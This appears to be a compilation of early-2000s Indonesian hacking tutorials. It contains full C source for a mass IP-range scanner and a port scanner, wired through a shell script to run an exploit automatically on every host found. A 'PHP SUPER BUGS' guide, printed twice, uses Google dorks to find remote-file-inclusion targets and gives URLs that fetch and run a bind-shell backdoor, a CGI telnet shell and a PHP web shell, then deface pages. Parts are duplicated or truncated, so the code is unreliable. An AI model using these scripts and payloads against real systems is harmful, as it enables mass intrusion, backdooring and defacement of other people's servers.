if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> getsockopt() timed out on connect()\n", ip, port);
close(fd);
return (-1);
}
if(getsockopt_error == 0)
{
if(fcntl(fd, F_SETFL, flags) < 0)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> fcntl() error setting socket flags to original state\n", ip, port);
close(fd);
return (-1);
}
return (1);
}
else
{
errno = getsockopt_error;
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> getsockopt() error on connect()\n", ip, port);
close(fd);
return (-1);
}
}
}
else
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> socket not readable or writable\n", ip, port);
close(fd);
return (-1);
}
if(fcntl(fd, F_SETFL, flags) < 0)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> fcntl() error setting socket flags to original state\n", ip, port);
close(fd);
return (-1);
}
return (1);
}
int usage(char *arg)
{
printf("\n [0;32m******************************** [0m\n");
printf(" [0;32m* MIG Port Scanner v1.0 by [0;31mno1 [0;32m* [0m\n");
printf(" [0;32m******************************** [0m\n");
printf("\n%s [[-h] | [-i ]] [-o ] [-p <#>] [-c <#>] [-t <#>] [-v] [-d]\n", arg);
printf("\n [-h]\tsingle ip address to scan\n");
printf(" [-i]\tfile with ip addresses to scan\n");
printf(" [-o]\tlog file (defult: stdout)\n");
printf(" [-p]\tports seperated by commas\n");
printf("\t(default: 21,22,23,25,53,80,110,111,113,119,143,515)\n");
printf(" [-c]\tnumber of children to spawn (default: 50)\n");
printf(" [-t]\tconnect timeout value (default: 3)\n");
printf(" [-v]\tfor verbose output (default: off)\n");
printf(" [-d]\tfor debuging output (default: off)\n\n");
return 0;
}
/*******************/
// greyhats.za.net //
/*******************/
--------------mig-port-scan.c end here---------------------------
iko berterimakasih kepada:
[+] qq
[+] tiyok
[+] keputih group
[+] everyone who shouting the freedom
iko tidak berterimakasih kepada:
[-] monopoli
[-] birokrasi
[-] para penjilat
[-] koruptor
[-] closed source
* Mass Scanner menggunakan gabungan
* beberapa tool dan satu exploit
*
* oleh : iko (iko94@yahoo.com)
* release : dec,15,200*
*
* No Warranty. This tutorial is for educational use only,
* commercial use is prohibited.
*
**********************************************************/
Masih ingat dengan artikel berjudul "Menggunakan Mass Scanner Dengan Telnet
Fingerprint Metode Shell Scripting" (milik mas scut di indohack.sf.net) ?
Artikel tersebut menerangkan tentang bagaimana cara mencoba satu exploit ke banyak
target sasaran yang berupa daftar di satu file. Mass Scanner Telnet Fingerprint itu
mempunyai satu kelemahan yaitu kita harus sudah membuat satu daftar nomor ip yang
akan di-scan.
Nah, bagaimana caranya agar kita tinggal mengetikkan satu baris perintah saja dan
semuanya akan berjalan dengan sendirinya ?
Berikut ini akan penulis jelaskan caranya, beserta tools yang diperlukan.
Tools:
1. mass.c (dicomot dari massplo.tar.gz milik mas slamet, source code di bawah)
2. mig-port-scan.c (milik no1 => greyhats.za.net , source code ada di bawah)
3. sebuah script sederhana (try.sh)
4. sebuah file log temporer
5. sebuah exploit
6. banyak kesabaran :)
Pertama-tama tentukan satu exploit yang akan dipakai (contoh : explo.c), kemudian
compile file tersebut (catatan : anda harus memahami betul bagaimana cara kerja
exploit tersebut). Langkah ke dua, compile file mig-port-scan.c . Langkah ke tiga,
buatlah satu script sederhana, yang akan kita gunakan untuk melakukan pengecekan
server target mana yang mempunyai port yang terbuka sesuai dengan kebutuhan exploit
kita, jika benar terbuka, maka exploit akan dijalankan dan melakukan penetrasi ke
server target.
Contoh script sederhana ini :
-----------try.sh start here--------------
#!/bin/sh
#
./mig-port-scan -h $1 -p port_yg_discan -o log_temporer
sleep 1
cat log_temporer
CEK="`cat log_temporer | awk '{print $2}'`"
if [ "$CEK" = "Open" ]; then
echo "OK server $1 terbuka, kita coba..."
./exploit -t $1
fi
echo "kita coba yang lain..... :("
-----------try.sh end here-----------------
Simpan dan chmod +x try.sh ini.
Perhatikan bahwa argumen $1 di atas mewakili nomor ip target kita, sedang sleep 1
detik digunakan untuk menanti konek back dari mig-port-scan (yaitu hasil scan).
Perhatikan juga tanda baca backquote (jangan sampai salah lho !) di variable CEK.
Anda juga harus mengganti baris ./exploit -t $1 , dengan perintah untuk menjalankan
exploit anda (dengan segala argumen-nya tentu!).
Ada dua keuntungan pemakaian try.sh ini, yaitu jika terjadi kondisi :
1. ketika exploit kita mandeg di tengah jalan (seperti stagnant/nyantol);
2. ketika kita sudah berhasil masuk ke suatu server target, dan kita ingin
meneruskan proses scanning kita;
maka kita tinggal memencet tombol control+c, dan proses pun akan terus berjalan,
karena yang ditutup adalah program script ini dan bukan program mass.
Nah, kita tinggal mengedit program utama, yaitu mass.c
Perhatikan source mass.c di baris perintah berikut:
sprintf(luck,"./try.sh %s",(char *)inet_ntoa(connlist[i].addr.sin_addr),(time(0)-connlist[i].a));
nah di situlah letak script kita tadi, baris tersebut menjalankan script kita
dengan cara memberikannya ke variabel luck (lihat baris system(luck);). Masih
tertarik ? Makanya segera belajarlah bahasa pemrograman !!!
Langkah terakhir, kita harus mengkompile mass.c agar bisa kita jalankan.
#gcc mass.c -o massexploit -Wall
lalu jalankan mass scanner kita :
#./massexploit
ikuti petunjuknya !
Selamat mencoba !!!
Berikut ini source code mass.c:
-----------------mass.c begin here-------------------------
#include
#include
#include
#include
#include
#include
#include
#include
#define MAX_SOCKETS 500
#define TIMEOUT 5
#define S_NONE 0
#define S_CONNECTING 1
struct conn_t {
int s;
char status;
time_t a;
struct sockaddr_in addr;
};
struct conn_t connlist[MAX_SOCKETS];
void init_sockets(void);
void check_sockets(void);
void fatal(char *);
int main(int argc, char *argv[])
{
int done, i, aa, bb, cc, dd, ret, k, ns;
unsigned int port;
time_t scantime;
char ip[20];
if (argc < 3) {
printf("Usage: %s
return -1;
}
done = 0; bb = 0; cc = 0; dd = 0; aa = 0; port = 0;
aa = atoi(argv[1]);
if ((aa < 0) || (aa > 255)) {
fatal("Invalid a-range\n");
}
port = (unsigned int)atoi(argv[2]);
if (port == 0)
fatal("Bad port number.\n");
if (argc >= 4) {
bb = atoi(argv[3]);
if ((bb < 0) || (bb > 255))
fatal("Invalid b-range.\n");
}
if (argc >= 5) {
cc = atoi(argv[4]);
if ((cc < 0) || (cc > 255))
fatal("Invalid c-range.\n");
}
init_sockets();
scantime = time(0);
while(!done) {
for (i = 0; i < MAX_SOCKETS; i++) {
if (dd == 255) {
if (cc < 255) {
cc++;
dd = 0;
}
else {
if (bb < 255) {
bb++;
cc = 0;
dd = 0;
}
else {
if (aa < 255) {
aa++;
bb = 0;
cc = 0;
dd = 0;
}
else {
ns = 0;
for (k = 0; k < MAX_SOCKETS; k++) {
if (connlist[k].status > S_NONE)
ns++;
}
if (ns == 0)
break;
}
}
}
}
if (connlist[i].status == S_NONE) {
connlist[i].s = socket(AF_INET, SOCK_STREAM, 0);
if (connlist[i].s != -1) {
ret = fcntl(connlist[i].s, F_SETFL, O_NONBLOCK);
if (ret == -1) {
printf("Unable to set O_NONBLOCK\n");
close(connlist[i].s);
}
else {
memset((char *)ip, 0, 20);
sprintf(ip, "%d.%d.%d.%d", aa, bb, cc, dd);
connlist[i].addr.sin_addr.s_addr = inet_addr(ip);
if (connlist[i].addr.sin_addr.s_addr == -1)
fatal("Invalid IP.");
connlist[i].addr.sin_family = AF_INET;
connlist[i].addr.sin_port = htons(port);
connlist[i].a = time(0);
connlist[i].status = S_CONNECTING;
dd++;
}
}
}
}
check_sockets();
}
}
void init_sockets(void)
{
int i;
for (i = 0; i < MAX_SOCKETS; i++) {
connlist[i].status = S_NONE;
memset((struct sockaddr_in *)&connlist[i].addr, 0,
sizeof(struct sockaddr_in));
}
}
void check_sockets(void)
{
int i, ret;
for (i = 0; i < MAX_SOCKETS; i++) {
if ((connlist[i].a < (time(0) - TIMEOUT)) &&
(connlist[i].status == S_CONNECTING)) {
close(connlist[i].s);
connlist[i].status = S_NONE;
}
else if (connlist[i].status == S_CONNECTING) {
ret = connect(connlist[i].s,
(struct sockaddr *)&connlist[i].addr,
sizeof(struct sockaddr_in));
if (ret == -1) {
if (errno == EISCONN) {
printf("%s\n",
(char *)inet_ntoa(connlist[i].addr.sin_addr),
(time(0)-connlist[i].a));
close(connlist[i].s);
connlist[i].status = S_NONE;
}
if ((errno != EALREADY) && (errno != EINPROGRESS)) {
close(connlist[i].s);
connlist[i].status = S_NONE;
}
}
else {
char luck[100];
sprintf(luck,"./try.sh %s",(char *)inet_ntoa(connlist[i].addr.sin_addr),(time(0)-connlist[i].a));
printf("Sodok ip %s\n",
(char *)inet_ntoa(connlist[i].addr.sin_addr),
(time(0)-connlist[i].a));
system(luck);
printf("Wuasuu, cuk...\n");
close(connlist[i].s);
connlist[i].status = S_NONE;
}
}
}
}
void fatal(char *err)
{
int i;
printf("Error: %s\n", err);
for (i = 0; i < MAX_SOCKETS; i++) {
if (connlist[i].status >= S_CONNECTING)
close(connlist[i].s);
}
exit(-1);
}
---------------mass.c end here--------------------------------------
Berikut source code mig-port-scan.c
---------------mig-port-scan.c start here---------------------------
/****************
name : mig-port-scan.c
version : 1.0
creation date : 15th of October 2002
author : no1 ( greyhats.za.net )
description : veeery fast connect() port scanner
with multi-host scanning support
usage : gcc mig-port-scan.c -o mig-port-scan -Wall
./mig-port-scan
extra : nmap is just too slow for simple connect()
scans of big IP lists thats why i coded this.
if you have any comments or suggestions, mail
me at no1@greyhats.za.net or msg me at
http://greyhats.za.net/guestbook/
****************/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
int scan(char *ip, int port, int time_out, int debug, FILE ** log, int logcheck, int v);
int get_port(char *ports, char *backup);
int Connect(int fd, char *ip, int port, int time_out, int debug);
int usage(char *arg);
long hosts_scanned = 0;
long ports_scanned = 12;
int main(int argc, char **argv)
{
int TIMEOUT = 3;
int CHILDREN = 50;
int PORT = 0;
int DEBUG = 0;
int i = 0;
int p = 0;
int log_check = 0;
int flag = 0;
int status;
int verbose = 0;
FILE *fp;
FILE *ld;
char IP[16] = "127.0.0.1";
char INPUT[256] = "./input318";
char OUTPUT[256] = "./log";
char PORTS[256] = "21,22,23,25,53,80,110,111,113,119,143,515,:";
char PORTS_BACKUP[256] = "21,22,23,25,53,80,110,111,113,119,143,515,:";
char *P_PORTS;
char *P_PORTS_BACKUP;
char opt;
P_PORTS = PORTS;
P_PORTS_BACKUP = PORTS_BACKUP;
while((opt = getopt(argc, argv, "h:i:p:o:c:t:vd")) != -1)
{
switch (opt)
{
case 'h':// ip
{
flag++;
bzero(IP, sizeof(IP));
strcpy(IP, optarg);
remove("./input318");
fp = fopen(INPUT, "w");
fprintf(fp, "%s\n", IP);
fclose(fp);
fp = fopen(INPUT, "r");
break;
}
case 'i':// file with ips
{
flag++;
bzero(INPUT, sizeof(INPUT));
strcpy(INPUT, optarg);
fp = fopen(INPUT, "r");
break;
}
case 'p':// ports in 21,22,23 format
{
bzero(PORTS, sizeof(PORTS));
bzero(PORTS_BACKUP, sizeof(PORTS_BACKUP));
strcpy(PORTS, optarg);
strcpy(PORTS_BACKUP, optarg);
strcat(PORTS, ",:");
strcat(PORTS_BACKUP, ",:");
puts("TEST");
ports_scanned = 0;
for(; PORTS[p] != 0; p++)
{
if(PORTS[p] == 44)
ports_scanned++;
}
break;
}
case 'o':// log file (stdout if not used)
{
log_check = 1;
strcpy(OUTPUT, optarg);
ld = fopen(OUTPUT, "w");
break;
}
case 'c':// number of children
{
CHILDREN = atoi(optarg);
break;
}
case 't':// timeout value for connect/read/write
{
TIMEOUT = atoi(optarg);
break;
}
case 'v':// verbose mode
{
verbose++;
break;
}
case 'd':// debuging output
{
DEBUG = 1;
break;
}
}
}
if((flag == 2) || (flag == 0))
{
usage(argv[0]);
exit(1);
}
while((fgets(IP, sizeof(IP), fp)) != NULL)
{
hosts_scanned++;
}
fclose(fp);
printf("\n [0;32m******************************** [0m\n");
printf(" [0;32m* MIG Port Scanner v1.0 by [0;31mno1 [0;32m* [0m\n");
printf(" [0;32m******************************** [0m\n\n");
printf("Hosts being scanned: %ld\n", hosts_scanned);
printf("Ports being scanned: %ld\n\n", ports_scanned);
bzero(IP, sizeof(IP));
fp = fopen(INPUT, "r");
while((fgets(IP, sizeof(IP), fp)) != NULL)
{
IP[strlen(IP) - 1] = '\0';
for(; (PORT = get_port(P_PORTS, P_PORTS_BACKUP)) != 0; i++)
{
switch (fork())
{
case 0:
{
scan(IP, PORT, TIMEOUT, DEBUG, &ld, log_check, verbose);
_exit(0);
break;
}
case -1:
{
perror("fork error");
_exit(0);
break;
}
default:
{
if(i > CHILDREN - 2)
{
wait(&status);
i--;
}
break;
}
}
}
bzero(IP, sizeof(IP));
}
remove("./input318");
fclose(fp);
return 0;
}
int scan(char *ip, int port, int time_out, int debug, FILE ** log, int logcheck, int v)
{
FILE *logs = *log;
int sockfd;
int stat;
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> socket() error\n", ip, port);
return (-1);
}
stat = Connect(sockfd, ip, port, time_out, debug);
if(stat == -1)
{
if(logcheck == 1)
{
if(v == 1)
fprintf(logs, "[%s][%d] Closed\n", ip, port);
fflush(logs);
close(sockfd);
}
else
{
if(v == 1)
fprintf(stdout, "[%s][%d] Closed\n", ip, port);
fflush(stdout);
close(sockfd);
}
return (-1);
}
if(stat == -2)
{
if(logcheck == 1)
{
if(v == 1)
fprintf(logs, "[%s][%d] Closed (could be firewall)\n", ip, port);
fflush(logs);
close(sockfd);
}
else
{
if(v == 1)
fprintf(stdout, "[%s][%d] Closed (could be firewall)\n", ip, port);
fflush(stdout);
close(sockfd);
}
return (-1);
}
else
{
if(logcheck == 1)
{
fprintf(logs, "[%s][%d] Open\n", ip, port);
fflush(logs);
close(sockfd);
}
else
{
fprintf(stdout, "[%s][%d] Open\n", ip, port);
fflush(stdout);
close(sockfd);
}
}
return (0);
}
int get_port(char *ports, char *backup)
{
int i;
int x;
int z;
char port[5];
char tmp[256];
bzero(port, sizeof(port));
bzero(tmp, sizeof(tmp));
strcpy(tmp, ports);
for(i = 0; ports[i] != ','; i++)
{
if(ports[i] == ':')
{
strcpy(ports, backup);
return 0;
}
port[i] = ports[i];
}
port[strlen(port)] = '\0';
for(z = strlen(port) + 1, x = 0; z < strlen(ports); z++)
{
ports[x++] = tmp[z];
}
ports[x] = '\0';
return atoi(port);
}
int Connect(int fd, char *ip, int port, int time_out, int debug)
{
int flags;
int select_status;
fd_set connect_read, connect_write;
struct timeval timeout;
int getsockopt_length = 0;
int getsockopt_error = 0;
struct sockaddr_in server;
bzero(&server, sizeof(server));
server.sin_family = AF_INET;
inet_pton(AF_INET, ip, &server.sin_addr);
server.sin_port = htons(port);
if((flags = fcntl(fd, F_GETFL, 0)) < 0)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> fcntl() error getting socket flags\n", ip, port);
close(fd);
return (-1);
}
if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> fcntl() error setting socket non-blocking\n", ip, port);
close(fd);
return (-1);
}
timeout.tv_sec = time_out;
timeout.tv_usec = 0;
FD_ZERO(&connect_read);
FD_ZERO(&connect_write);
FD_SET(fd, &connect_read);
FD_SET(fd, &connect_write);
if((connect(fd, (struct sockaddr *) &server, sizeof(server))) < 0)
{
if(errno != EINPROGRESS)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> connect() error\n", ip, port);
close(fd);
return (-1);
}
}
else
{
if(fcntl(fd, F_SETFL, flags) < 0)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> fcntl() error setting socket flags to original state\n", ip, port);
close(fd);
return (-1);
}
return (1);
}
select_status = select(fd + 1, &connect_read, &connect_write, NULL, &timeout);
if(select_status == 0)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> connect() timed out\n", ip, port);
close(fd);
return (-2);
}
if(select_status == -1)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> select() error on connect()\n", ip, port);
close(fd);
return (-1);
}
if(FD_ISSET(fd, &connect_read) || FD_ISSET(fd, &connect_write))
{
if(FD_ISSET(fd, &connect_read) && FD_ISSET(fd, &connect_write))
{
getsockopt_length = sizeof(getsockopt_error);
if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_error, &getsockopt_length) < 0)
{
errno = ETIMEDOUT;
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> getsockopt() timed out on connect()\n", ip, port);
close(fd);
return (-1);
}
if(getsockopt_error == 0)
{
if(fcntl(fd, F_SETFL, flags) < 0)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> fcntl() error setting socket flags to original state\n", ip, port);
close(fd);
return (-1);
}
return (1);
}
else
{
errno = getsockopt_error;
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> getsockopt() error on connect()\n", ip, port);
close(fd);
return (-1);
}
}
}
else
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> socket not readable or writable\n", ip, port);
close(fd);
return (-1);
}
if(fcntl(fd, F_SETFL, flags) < 0)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> fcntl() error setting socket flags to original state\n", ip, port);
close(fd);
return (-1);
}
return (1);
}
int usage(char *arg)
{
printf("\n [0;32m******************************** [0m\n");
printf(" [0;32m* MIG Port Scanner v1.0 by [0;31mno1 [0;32m* [0m\n");
printf(" [0;32m******************************** [0m\n");
printf("\n%s [[-h
printf("\n [-h]\tsingle ip address to scan\n");
printf(" [-i]\tfile with ip addresses to scan\n");
printf(" [-o]\tlog file (defult: stdout)\n");
printf(" [-p]\tports seperated by commas\n");
printf("\t(default: 21,22,23,25,53,80,110,111,113,119,143,515)\n");
printf(" [-c]\tnumber of children to spawn (default: 50)\n");
printf(" [-t]\tconnect timeout value (default: 3)\n");
printf(" [-v]\tfor verbose output (default: off)\n");
printf(" [-d]\tfor debuging output (default: off)\n\n");
return 0;
}
/*******************/
// greyhats.za.net //
/*******************/
--------------mig-port-scan.c end here---------------------------
iko berterimakasih kepada:
[+] tiyok
[+] keputih group
[+] everyone who shouting the freedom
iko tidak berterimakasih kepada:
[-] monopoli
[-] birokrasi
[-] para penjilat
[-] koruptor
[-] closed source
TRIK 9 HACKING
===========
Tittle : SUPER KIDDIES HACKING: "PHP SUPER BUGS"
Author : K-159
Greetz : Lieur-Euy, Red_Face, Itsme-, yudhax, pe_es, bithedz, KuNtuA, Baylaw, Minangcrew,
Chanel : #bandunghacker, #indohackinglink, #hackercrew, #batamhacker, #aikmel
Email : eufrato@linuxmail.org
Reference : security-corporations.com, security-focus.com, bugs-traq, google.com
--------------------------------------------------------------------------------------------------------
Prolog : i wrote this tutorial just for my dearest brother "Lieur-Euy" thx for all the best friendship, spirit, motivation, kindness, joke, and all the time that we spend together. just wait, till i finished my homework. 'n we will rock the world again :)
1. allinurl filename
bugs filename ini targetnya dapat kita cari dengan keyword "allinurl:*.php?filename=*".
keyword '*.php' bisa di ganti dengan apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?filename=*". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts "
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
2. allinurl content
bugs content ini targetnya dapat kita cari dengan keyword "allinurl:*.php?content=".
keyword '*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?content=". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
" http://www.target.com/target/index.php?content=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts "
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
3. allinurl page
bugs page ini targetnya dapat kita cari dengan keyword "allinurl:*.php?page=*".
'*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?page=". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?page=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
4. allinurl link
bugs filename ini targetnya dapat kita cari dengan keyword "allinurl:*.php?link=*".
keyword '*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?link=*". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?link=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
5.allinurl file
bugs file ini targetnya dapat kita cari dengan keyword "allinurl:*.php?file=*".
'*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?file=*". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?file=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
Setelah mendapatkan target yang vulnerable ada beberapa hal yang bisa kita lakukan :
I. install bindtty telnet
1.buat url seperti ini:
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/bind1 -O /tmp/httpd "
url diatas untuk melakukan wget bindtty telnet ke server target dan hasil wget nya di taruh di folder /tmp dg nama file httpd.
2.lalu ubah file httpd yg berada di folder /tmp tadi jadi file eksekusi:
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /tmp/httpd "
3.eksekusi file httpd tadi :
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=/tmp/httpd "
4. buka telnet ke IP target sesuai dg port bindttynya
II. install Cgi-telnet
1.buat url seperti ini :
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/pees.pl -O /var/www/cgi-bin/test.pl "
url diatas untuk melakukan wget cgi-telnet test.pl ke server target dan hasil wget disimpan di folder /var/www/cgi-bin dg nama file test.pl. sesuaikan dengan letak folder cgi-bin didalam server tersebut untuk menyimpan hasil wget cgi-telnetnya.
2. buat cgi-telnet test.pl jadi file eksekusi :
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /var/www/cgi-bin/test.pl "
3. akses cgitelnet kita dengan membuka url :
" http://www.target.com/cgi-bin/test.pl "
masukkan passwordnya "n0fr13"
III. install shell php
1. buat url seperti ini :
"http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://emilroni.port5.com/mail.php -O log.php "
url diatas utk melakukan wget ke server target dan hasil wget berupa file log.php. bila keluar pesan "permission denied" cari lah folder lain yang bisa untuk wget shell.php kita.
2. akses shell php kita sesuai dengan foldernya :
" http://www.target.com/target/log.php "
IV. Deface
http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=echo "K-159 and crew was touch your system" > test.html
thats all my friends. just try it !!!
Tittle : SUPER KIDDIES HACKING: "PHP SUPER BUGS"
Author : K-159
Greetz : Lieur-Euy, Red_Face, Itsme-, yudhax, pe_es, bithedz, KuNtuA, Baylaw, Minangcrew,
Chanel : #bandunghacker, #indohackinglink, #hackercrew, #batamhacker, #aikmel
Email : eufrato@linuxmail.org
Reference : security-corporations.com, security-focus.com, bugs-traq, google.com
--------------------------------------------------------------------------------------------------------
Prolog : i wrote this tutorial just for my dearest brother "Lieur-Euy" thx for all the best friendship, spirit, motivation, kindness, joke, and all the time that we spend together. just wait, till i finished my homework. 'n we will rock the world again :)
1. allinurl filename
bugs filename ini targetnya dapat kita cari dengan keyword "allinurl:*.php?filename=*".
keyword '*.php' bisa di ganti dengan apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?filename=*". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts "
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
2. allinurl content
bugs content ini targetnya dapat kita cari dengan keyword "allinurl:*.php?content=".
keyword '*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?content=". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
" http://www.target.com/target/index.php?content=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts "
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
3. allinurl page
bugs page ini targetnya dapat kita cari dengan keyword "allinurl:*.php?page=*".
'*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?page=". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?page=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
4. allinurl link
bugs filename ini targetnya dapat kita cari dengan keyword "allinurl:*.php?link=*".
keyword '*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?link=*". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?link=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
5.allinurl file
bugs file ini targetnya dapat kita cari dengan keyword "allinurl:*.php?file=*".
'*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?file=*". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?file=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
Setelah mendapatkan target yang vulnerable ada beberapa hal yang bisa kita lakukan :
I. install bindtty telnet
1.buat url seperti ini:
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/bind1 -O /tmp/httpd "
url diatas untuk melakukan wget bindtty telnet ke server target dan hasil wget nya di taruh di folder /tmp dg nama file httpd.
2.lalu ubah file httpd yg berada di folder /tmp tadi jadi file eksekusi:
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /tmp/httpd "
3.eksekusi file httpd tadi :
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=/tmp/httpd "
4. buka telnet ke IP target sesuai dg port bindttynya
II. install Cgi-telnet
1.buat url seperti ini :
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/pees.pl -O /var/www/cgi-bin/test.pl "
url diatas untuk melakukan wget cgi-telnet test.pl ke server target dan hasil wget disimpan di folder /var/www/cgi-bin dg nama file test.pl. sesuaikan dengan letak folder cgi-bin didalam server tersebut untuk menyimpan hasil wget cgi-telnetnya.
2. buat cgi-telnet test.pl jadi file eksekusi :
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /var/www/cgi-bin/test.pl "
3. akses cgitelnet kita dengan membuka url :
" http://www.target.com/cgi-bin/test.pl "
masukkan passwordnya "n0fr13"
III. install shell php
1. buat url seperti ini :
"http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://emilroni.port5.com/mail.php -O log.php "
url diatas utk melakukan wget ke server target dan hasil wget berupa file log.php. bila keluar pesan "permission denied" cari lah folder lain yang bisa untuk wget shell.php kita.
2. akses shell php kita sesuai dengan foldernya :
" http://www.target.com/target/log.php "
IV. Deface
http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=echo "K-159 and crew was touch your system" > test.html
thats all my friends. just try it !!!
TRIK 8 HACKING
=======
VHOST
= edit di httpd.conf
= tinggal tambah no
= kong di named.conf
= 1. wget http://apache.towardex.com/httpd/apache_1.3.27.tar.gz
= 2. tar zxvf apache_1.3.27.tar.gz
= 3. cd apache_1.3.27
= 4. ./configure
= 5. make
= 6. make install
= 7. /usr/local/apache/bin/apachectl start
= cd /usr/local/apache/conf/httpd.conf
= contoh
= echo "" > httpd.conf
= echo "ServerName www.Cmaster4.net" > httpd.conf
= echo "DocumentRoot /home/iptek/public_html" > httpd.conf
= echo "ScriptAlias /cgi-bin /www/Cmaster4.net/cgi-bin" > httpd.conf
= echo " " >> httpd.conf
= ------------------------------
= ------------------------------
= ------------------------------
